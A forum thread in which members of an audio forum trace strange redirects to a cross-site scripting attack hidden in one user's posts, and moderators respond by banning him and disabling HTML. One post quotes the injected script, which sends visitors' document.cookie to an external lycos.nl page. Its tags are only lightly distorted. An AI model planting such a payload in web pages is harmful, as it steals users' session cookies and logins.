What the "hack" is this?

[Netlist]

Clicking on a thread which contains a post from programx, I get redirected to http://members.lycos.nl/protect0rzg...1142; Bericht2=http://www.diyaudio.com/forums
This seems to reveal quite a lot of my personal information.
Looking at the posts from programx you see nothing, but in this list a strange script appears.
Is this normal or is this only a test from programx or the moderators or the board software.
http://diyaudio.com/forums/search.php?action=showresults&searchid=259833
/Hugo

 

[dhaen]

Same here. I thought it was a problem at my end....

 

[dhaen]

Could it be this bit of invisible code in his posts:

<s********ript>window.open('http://members.lycos.nl/protect0rzgame/1.php?Bericht='+document.cookie+'&Bericht2=http://www.diyaudio.com/forums');</scr****ipt></font></p>

(script commands have been deliberately distorted to save replication)


Maybe the moderators should be more careful....

 

[jleaman]

every time i click on a link i get spamed with posting's

 

[AudioFreak]

Thanks for bringing my attention to this. Programx has been banned pending investigation. It is hard to tell the extent of the information stolen from a user when redirected to that script but there are good odds that complete login details have been stolen. Anyone who thinks they may have been affected should change their password as a matter of urgency. On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.

 

[Netlist]

On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.

Thanks AudioFreak
Of course it was never my intention to accuse the mods.
I have a rather high S/N ratio in feeling when something is wrong.
IMHO, the name "programx" and the location "test" was a good indication.
A real smart guy would have done better

/Hugo

 

[dhaen]

Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat

 

[pinkmouse]

Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat

Believe it or not, us mods don't censor much, and we always err on the side of letting things through. Although we try to keep as tight a ship as possible, sometimes these things just slip through the cracks , sorry.

As AF said above, one of the best things you can do for your own security and peace of mind is regularly change your passwords, and this applies not just to diyAudio, but the 'net in general.

 

[Jason]

HTML has been disabled across the board to prevent this happening again. Sorry if it breaks some older posts using image tags etc.

Allowing HTML in posts is sadly in this day and age really limited to intranet applications, where theives do not roam freely.

 

[dhaen]

Disabled html

It's a shame really, but I suppose it was a bomb waiting to be ignited.
Thank you, I feel safer now.